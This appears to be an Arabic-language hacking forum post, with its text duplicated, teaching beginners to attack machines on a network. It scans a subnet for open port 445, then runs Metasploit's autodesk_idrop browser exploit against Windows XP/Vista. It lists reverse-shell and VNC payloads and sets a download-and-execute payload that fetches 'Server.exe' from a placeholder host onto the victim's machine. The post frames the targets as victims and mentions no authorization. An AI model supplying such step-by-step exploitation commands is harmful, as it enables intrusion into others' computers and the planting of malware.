rss
07-07-2012, 06:50 PM
http://img233.imageshack.us/img233/657/22363887.png
كيفك يا جميل
انشالله تكون بألف خير
رمضان كريم
أولاً لك
ولجميع المسلمين والمسلمات
:27:
أما بعد أخي الكريم
أولاً وقبل كل شي
لزم تعرف أنا هاد الموضوع عملتو للمبتدئين ب Penetring And ExploitinG
لي يعرف شويء بالإقتحام يغلق الموضوع
هه
تعالى هون مرحبا بك :35:
المهم
:)
http://sl.glitter-graphics.net/pub/523/523180di3mni1tad.gif
أول شي لزم تتوفر على برنامج
ANGRY iP Scanner
أو تقدر تفحص بعدة طرق وأدوات
Nmap
Znmap
إلخ ....
راح أعتمد على هاد البرنامج المحبوب عند المبتدئين :)
نفتح البرنامج
http://www.monsterup.com/upload/1341657254645.png
ده واجهت البرنامج
تانياً
نبحت عن الابيات المصابة
لكن قبل
لزم نعرف الابي تبعنا لكي نملأها داخل البرنامج الأول
start
Executer
Cmd
Ipconfig
توضيح أكتر :)
http://www.monsterup.com/upload/134165760459.gif
ملاحضة
الابي للازم هو:
192.168.1.5
اكتب بالمربع الأول
192.168.1.1
والمربع التاني
192.168.1.255
تمام :)
http://www.monsterup.com/upload/1341657818798.png
نضغط OptioN
Select PorT
http://www.monsterup.com/upload/1341657921309.png
بعدين نكتب البورت المراد فحصو !
بما أنه موضوع للمبتدئين
راح تبدأ ببورت
445
في عدة بورتات للإستغلال
21
32
45
4445
راح يتم شرحها في مواضيع مقبلة انشالله
:35:
طيب يا جميل اكتب 445
http://www.monsterup.com/upload/1341658147731.png
تمام انقر Start
http://www.monsterup.com/upload/1341658233702.png
جميل
الأن راح يعطيك 3 دوائر ب-3 ألوان مختلفةالأول
http://www.monsterup.com/upload/1341658349535.png
شغال :)
التاني
http://www.monsterup.com/upload/1341658401427.png
شغال لكن البورت 445 مقفل
التالت
http://www.monsterup.com/upload/1341658486519.png
باين من لونو :)
:35:
تمام الأن راح نستغل
إفتح Console
http://www.monsterup.com/upload/1341658574735.png
إنقر
http://www.monsterup.com/upload/1341658606312.png
نبحت عن تغرة المناسبة أنا راح اختار تغرة Xml
حسب رغبة :)
http://www.monsterup.com/upload/134165873032.png
نضغط على المحدد بلون الأحمر
تم نختار
http://www.monsterup.com/upload/1341658846459.png
نشرح هي العبارة لاخونا المبتدئين
Windows Xp SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0.2 $ IE 7.0
Windows Xp SP0-SP3 = تشتغل على إكسبي من سرفيس بك 0 إلى 3
Windows Vista SP0-SP1 = تشتغل على فيستا من سرفيس بك 0 إلى 1
IE 6.0 £ IE 7.0 = تشتغل على الإكسبلوتر السادس والسابع
تمام نضغط عليها
http://www.monsterup.com/upload/1341659088877.png
ننسخ المحدد بلأحمر
نروح
Console
http://www.monsterup.com/upload/1341659180224.png
الموجود بهاد شريط
http://www.monsterup.com/upload/1341658574735.png
طيب يا حلو
من هنا راح يتم تشغيل تغرة
http://www.monsterup.com/upload/1341659314210.png
نكتب الأمر :
use Windows/browser/autodesk_idrop
نضغط Entrer
يطلع لنا
http://www.monsterup.com/upload/1341659496149.png
بعدما اخترنا تغرة
نجي نختار البايلود المناسب
Show Payloads
معلومة
Payload = إستغلال
راح اعطيكم أهم الاستغلالات:
Windows/vncinject/reverse_tcp = فتح سطح المكتب ودوس
Windows/Download_exec = إنزل ملف تنفيدي وتشغيل
Windows/****************l/reverse_tcp = إتصال عكسي مع ضحية وفتح دوس
Windows/meterpreter/reverse_tcp = ملفات ضاحية وفتح دوس
إلخ إلخ ....
نجرب إستغلال ب
Windows_Download_exec
http://www.monsterup.com/upload/1341659902205.png
نكتب set payload windows/download_exec
نضغط إنتر
http://www.monsterup.com/upload/1341660055930.png
نضغط Show Options
نكتب set URL WwW.XXXX.cOm/Server.exe (http://WwW.XXXX.cOm/Server.exe)
http://www.monsterup.com/upload/1341660174724.png
نقتحم Exploit
http://www.monsterup.com/upload/1341660280402.png
جميل تم
http://www.monsterup.com/upload/1341660317865.png
اتمنى
ينال درس اعجابكم
أخوكم أنس
:35:
كيفك يا جميل
انشالله تكون بألف خير
رمضان كريم
أولاً لك
ولجميع المسلمين والمسلمات
:27:
أما بعد أخي الكريم
أولاً وقبل كل شي
لزم تعرف أنا هاد الموضوع عملتو للمبتدئين ب Penetring And ExploitinG
لي يعرف شويء بالإقتحام يغلق الموضوع
هه
تعالى هون مرحبا بك :35:
المهم
:)
http://sl.glitter-graphics.net/pub/523/523180di3mni1tad.gif
أول شي لزم تتوفر على برنامج
ANGRY iP Scanner
أو تقدر تفحص بعدة طرق وأدوات
Nmap
Znmap
إلخ ....
راح أعتمد على هاد البرنامج المحبوب عند المبتدئين :)
نفتح البرنامج
http://www.monsterup.com/upload/1341657254645.png
ده واجهت البرنامج
تانياً
نبحت عن الابيات المصابة
لكن قبل
لزم نعرف الابي تبعنا لكي نملأها داخل البرنامج الأول
start
Executer
Cmd
Ipconfig
توضيح أكتر :)
http://www.monsterup.com/upload/134165760459.gif
ملاحضة
الابي للازم هو:
192.168.1.5
اكتب بالمربع الأول
192.168.1.1
والمربع التاني
192.168.1.255
تمام :)
http://www.monsterup.com/upload/1341657818798.png
نضغط OptioN
Select PorT
http://www.monsterup.com/upload/1341657921309.png
بعدين نكتب البورت المراد فحصو !
بما أنه موضوع للمبتدئين
راح تبدأ ببورت
445
في عدة بورتات للإستغلال
21
32
45
4445
راح يتم شرحها في مواضيع مقبلة انشالله
:35:
طيب يا جميل اكتب 445
http://www.monsterup.com/upload/1341658147731.png
تمام انقر Start
http://www.monsterup.com/upload/1341658233702.png
جميل
الأن راح يعطيك 3 دوائر ب-3 ألوان مختلفةالأول
http://www.monsterup.com/upload/1341658349535.png
شغال :)
التاني
http://www.monsterup.com/upload/1341658401427.png
شغال لكن البورت 445 مقفل
التالت
http://www.monsterup.com/upload/1341658486519.png
باين من لونو :)
:35:
تمام الأن راح نستغل
إفتح Console
http://www.monsterup.com/upload/1341658574735.png
إنقر
http://www.monsterup.com/upload/1341658606312.png
نبحت عن تغرة المناسبة أنا راح اختار تغرة Xml
حسب رغبة :)
http://www.monsterup.com/upload/134165873032.png
نضغط على المحدد بلون الأحمر
تم نختار
http://www.monsterup.com/upload/1341658846459.png
نشرح هي العبارة لاخونا المبتدئين
Windows Xp SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0.2 $ IE 7.0
Windows Xp SP0-SP3 = تشتغل على إكسبي من سرفيس بك 0 إلى 3
Windows Vista SP0-SP1 = تشتغل على فيستا من سرفيس بك 0 إلى 1
IE 6.0 £ IE 7.0 = تشتغل على الإكسبلوتر السادس والسابع
تمام نضغط عليها
http://www.monsterup.com/upload/1341659088877.png
ننسخ المحدد بلأحمر
نروح
Console
http://www.monsterup.com/upload/1341659180224.png
الموجود بهاد شريط
http://www.monsterup.com/upload/1341658574735.png
طيب يا حلو
من هنا راح يتم تشغيل تغرة
http://www.monsterup.com/upload/1341659314210.png
نكتب الأمر :
use Windows/browser/autodesk_idrop
نضغط Entrer
يطلع لنا
http://www.monsterup.com/upload/1341659496149.png
بعدما اخترنا تغرة
نجي نختار البايلود المناسب
Show Payloads
معلومة
Payload = إستغلال
راح اعطيكم أهم الاستغلالات:
Windows/vncinject/reverse_tcp = فتح سطح المكتب ودوس
Windows/Download_exec = إنزل ملف تنفيدي وتشغيل
Windows/****************l/reverse_tcp = إتصال عكسي مع ضحية وفتح دوس
Windows/meterpreter/reverse_tcp = ملفات ضاحية وفتح دوس
إلخ إلخ ....
نجرب إستغلال ب
Windows_Download_exec
http://www.monsterup.com/upload/1341659902205.png
نكتب set payload windows/download_exec
نضغط إنتر
http://www.monsterup.com/upload/1341660055930.png
نضغط Show Options
نكتب set URL WwW.XXXX.cOm/Server.exe (http://WwW.XXXX.cOm/Server.exe)
http://www.monsterup.com/upload/1341660174724.png
نقتحم Exploit
http://www.monsterup.com/upload/1341660280402.png
جميل تم
http://www.monsterup.com/upload/1341660317865.png
اتمنى
ينال درس اعجابكم
أخوكم أنس
:35: